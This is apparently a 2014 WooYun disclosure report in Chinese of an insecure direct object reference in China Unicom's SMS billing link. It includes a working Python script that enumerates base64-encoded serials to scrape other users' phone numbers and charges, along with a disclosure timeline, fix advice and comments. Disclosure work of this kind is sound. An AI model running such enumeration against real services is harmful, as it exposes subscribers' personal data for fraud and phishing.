中国联通短信话费通知链接泄露用户信息

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-086939

漏洞标题：中国联通短信话费通知链接泄露用户信息

漏洞作者：路人甲

提交时间：2014-12-12 16:57

修复时间：2015-01-26 16:58

公开时间：2015-01-26 16:58

漏洞类型：设计缺陷/逻辑错误

危害等级：中

自评Rank：5

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-12-12：细节已通知厂商并且等待厂商处理中
2014-12-16：厂商已经确认，细节仅向厂商公开
2014-12-26：细节向核心白帽子及相关领域专家公开
2015-01-05：细节向普通白帽子公开
2015-01-15：细节向实习白帽子公开
2015-01-26：细节向公众公开

简要描述：

中国联通短信话费通知提供一个链接，通过变更URL，可以查询到其他用户的手机号的消费记录（可能可以精确到月）
可以利用获取到的信息, 进行对手机用户的进一步欺骗和钓鱼. 泄露的手机号码和消费记录也可以推测出使用者的垃圾短信利用价值

详细说明：

收到短信话费提醒通知（为了保护自己的隐私已经打码）

链接为: http://114.247.0.103:8080/bill/d.h?attrs=XXXXXXXX
直接使用了IP+端口的URL，粗看以为是钓鱼短信。用curl获取到页面代码后，发现居然真的是官方页面……费用什么的都是正确的，引用的也是wo.cn的资源(js/css什么的)
考虑到链接的attr属性非常像base64编码, 尝试解码:

发现是简单的日期和一些序号组成, 经过验证, 简单的修改序号即可查询到其他人的手机号码和话费.

漏洞证明：

由于时间限制, 暂时只进行了很浅的信息抓取, 有理由相信可以深入挖掘出不少信息.
验证脚本

#!/usr/bin/env python
# -*- encoding: utf-8 -*-
import hashlib
import httplib
import re
from base64 import b64encode, b64decode
HOST = "114.247.0.103:8080"
PATH = """/bill/d.h?attrs="""
PROG = re.compile('<div class="mobile">[0-9]+<')
RMB_PROG = re.compile('<div class="rmb">.*<')
# RMB_PROG = re.compile('<div class="rmb">[0-9]+\.[0-9]+<')
def get(path):
    conn = httplib.HTTPConnection(HOST, timeout=3)
    conn.request("GET", path)
    rsp = conn.getresponse()
    print(rsp.status, rsp.reason)
    text = rsp.read()
    match = PROG.search(text)
    
    if match is not None:
        span = match.span()
        print(text[span[0]:span[1]])
    match = RMB_PROG.search(text)
    if match is not None:
        span = match.span()
        print(text[span[0]:span[1]])
    # with open("t.log", "wb") as fp:
    #     fp.write(rsp.read())
def gen_serial():
    # for i in range(108350, 118350):
    for i in range(1084, 1088):
        yield str(i) + "5020141225020141109713411"
def main():
    for s in gen_serial():
        get(PATH + b64encode(s))
if __name__ == "__main__":
    main()

验证结果

修复方案：

URL中使用的标识字符串不能暴露任何业务/用户相关信息, 并且不能被简单的碰撞出正确的标识字符串

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2014-12-16 18:22

厂商回复：

CNVD确认所述情况，已经由CNVD通过以往建立的处置渠道中国联通通报。

漏洞评价：

2014-12-12 16:59 | 浩天 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

有点意思
2014-12-12 21:14 | 机器猫 ( 普通白帽子 | Rank:1141 漏洞数:253 | 爱生活、爱腾讯、爱网络！)

厂商已忽略~哈哈
2014-12-16 19:09 | 草榴社区 ( 普通白帽子 | Rank:109 漏洞数:26 | 未满18周岁,不准进入.)

http://114.247.0.103:8080/bill/d.h? 这个么?没看出来怎么加密的

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-086939

漏洞标题：中国联通短信话费通知链接泄露用户信息

相关厂商：中国联通

漏洞作者：路人甲

提交时间：2014-12-12 16:57

修复时间：2015-01-26 16:58

公开时间：2015-01-26 16:58

漏洞类型：设计缺陷/逻辑错误

危害等级：中

自评Rank：5

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-086939

漏洞标题：中国联通短信话费通知链接泄露用户信息

相关厂商：中国联通

漏洞作者： 路人甲

提交时间：2014-12-12 16:57

修复时间：2015-01-26 16:58

公开时间：2015-01-26 16:58

漏洞类型：设计缺陷/逻辑错误

危害等级：中

自评Rank：5

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-086939"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云